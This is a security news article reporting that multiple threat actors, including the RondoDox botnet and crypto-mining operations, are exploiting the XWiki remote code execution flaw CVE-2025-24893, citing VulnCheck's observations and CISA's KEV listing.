Threat actors started exploiting a critical XWiki vulnerability en masse within two weeks of the bug being reported as exploited in the wild, VulnCheck warns.
Tracked as CVE-2025-24893 (CVSS score of 9.8), the flaw was discovered in May 2024 and patched in June 2024, but a CVE identifier was assigned to it only in early 2025, after technical information became public.
The bug exists because, in XWiki versions before 15.10.11, 16.4.1 and 16.5.0RC1, user-supplied input to a search function is improperly sanitized, allowing remote, unauthenticated attackers to execute arbitrary code via crafted requests to the search endpoint.
Proof-of-concept (PoC) code targeting the issue has been publicly available since early 2025, and security researchers observed the defect being targeted in reconnaissance attempts, but in-the-wild exploitation started only last month.
In late October, VulnCheck warned that a threat actor was exploiting CVE-2025-24893 as part of a cryptocurrency mining operation, and the US cybersecurity agency CISA added the bug to its Known Exploited Vulnerabilities (KEV) catalog two days later.
Now, VulnCheck says the activity targeting vulnerable XWiki servers has expanded significantly, with multiple threat actors exploiting the bug in their attacks.
The RondoDox botnet has added an exploit for the CVE to its toolset and, starting November 3, it has increasingly targeted the flaw in attacks.
Since November 7, the flaw has been exploited in a second crypto-mining operation, while the threat actor behind the first mining operation expanded its activity with two new payload hosting servers and a new server hosting the exploit.
VulnCheck also observed attacks in which an IP address associated with AWS, with no history of abuse, was used “to establish a reverse shell back to itself using the BusyBox nc binary”, likely as part of a targeted attack.
Other threat actors also attempted to establish web shells on vulnerable XWiki servers. One of the attacks originated from an IP that “exposes both QNAP and DrayTek interfaces to the internet”, likely because it is a compromised host, and attempted to deploy a bash reverse shell.
Additionally, VulnCheck has observed numerous threat actors simply performing scans and probes of vulnerable servers, including some using Nuclei templates.
“Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale,” VulnCheck notes.
Related: Fortinet Confirms Active Exploitation of Critical FortiWeb Vulnerability
Related: Chrome Zero-Day Exploitation Linked to Hacking Team Spyware
Related: Exploitation of Critical Adobe Commerce Flaw Puts Many eCommerce Sites at Risk
Related: CISA Confirms Exploitation of Latest Oracle EBS Vulnerability
